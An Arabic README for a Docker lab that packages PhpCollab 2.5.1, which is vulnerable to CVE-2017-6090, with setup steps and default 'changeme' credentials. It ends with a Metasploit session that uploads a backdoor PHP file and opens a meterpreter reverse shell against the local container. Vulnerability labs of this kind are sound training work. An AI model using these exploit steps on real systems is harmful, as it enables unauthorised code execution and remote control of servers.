
PhpCollab القابل للاستغلال في حاوية
يقوم هذا المشروع ببناء حاوية تحتوي على PhpCollab 2.5.1، والتي تتضمن ثغرة تنفيذ تعليمات برمجية عن بُعد كما هو موضح في CVE-2017-6090. بالإضافة إلى ذلك، يوجد ملف docker-compose لبدء تلك الحاوية و mysql لعرض العرض التوضيحي، وتعليمات الاستغلال أدناه.
docker build -t اسم الحاوية . أو استخدم الصورة jlkinsel/exploit-cve-2017-6090
أسهل طريقة لتشغيل هذا الشيء هي استخدام ملف docker-compose.yml المرفق. إذا شعرت بالملل في وقت ما - أو أظهر الأشخاص اهتماماً - سأقوم بإنشاء نشر kubernetes أو مخطط helm.
لذا، لبدء الأمور:
docker-compose up
حتى الآن، كل شيء على ما يرام! الآن، يجب تكوين phpcollab لاستخدام قاعدة البيانات، وتعيين كلمة مرور افتراضية للمشرف. لقد حاولت (بإيجاز) أتمتة هذا، لكن...حسناً...تبدو كشخص يعرف كيفية استخدام متصفح...
أخيراً، يمكنك تسجيل الدخول والتجول، لكن هذا غير ضروري للاستغلال.
لاحظ أن هذا التكوين docker لا يفعل أي شيء متطور للتخزين.
إذا كنت ترغب في الاحتفاظ بقاعدة بيانات mysql، ستحتاج إلى
إضافة تعريف وحدة تخزين لخدمة mysql في ملف
docker-compose.yml. راجع الأمثلة على صفحة mariadb docker hub
أولاً - اتبع التشغيل والإعداد أعلاه لتشغيل التطبيق.
لم أضف استغلالاً في هذا المشروع، لأنه، حسناً، Metasploit.
جديد في MSF؟ إليك نظرة سريعة على استغلال الحاوية التي بدأناها للتو:
docker run -ti --network exploitcve20176090_default remnux/metasploit
يستغرق هذا بضع دقائق لتشغيل الأشياء. صفحة remnux/metasploit على docker hub تغطي استخدام وحدات التخزين حتى لا يستغرق هذا وقتاً طويلاً في المستقبل. لكننا الآن على وشك الانتهاء!
بمجرد الحصول على موجه الأوامر، فلنكمل:
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit
[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php
meterpreter >
عند هذه النقطة، تكون قد دخلت، ويمكن أن تبدأ الألعاب.
إذا كان اسم هذا الدليل شيئاً آخر غير "exploit-CVE-2017-6090" فسيتعين عليك تغيير الأمر --network أعلاه.
أيضاً - نعم، قمنا بتعيين المنفذ البعيد إلى 80 في msfconsole، على الرغم من أنه 8088 خارجياً. حاوية metasploit موجودة على نفس الشبكة مثل حاوية phpcollab.
| الحقل | القيمة |
|---|
| خادم قاعدة البيانات | mysql |
| تسجيل الدخول إلى قاعدة البيانات | phpcollab |
| كلمة مرور قاعدة البيانات | changeme |
| اسم قاعدة البيانات | phpcollab |
| الإشعارات | False |
| كلمة مرور المشرف | changeme (أو ما تريد) |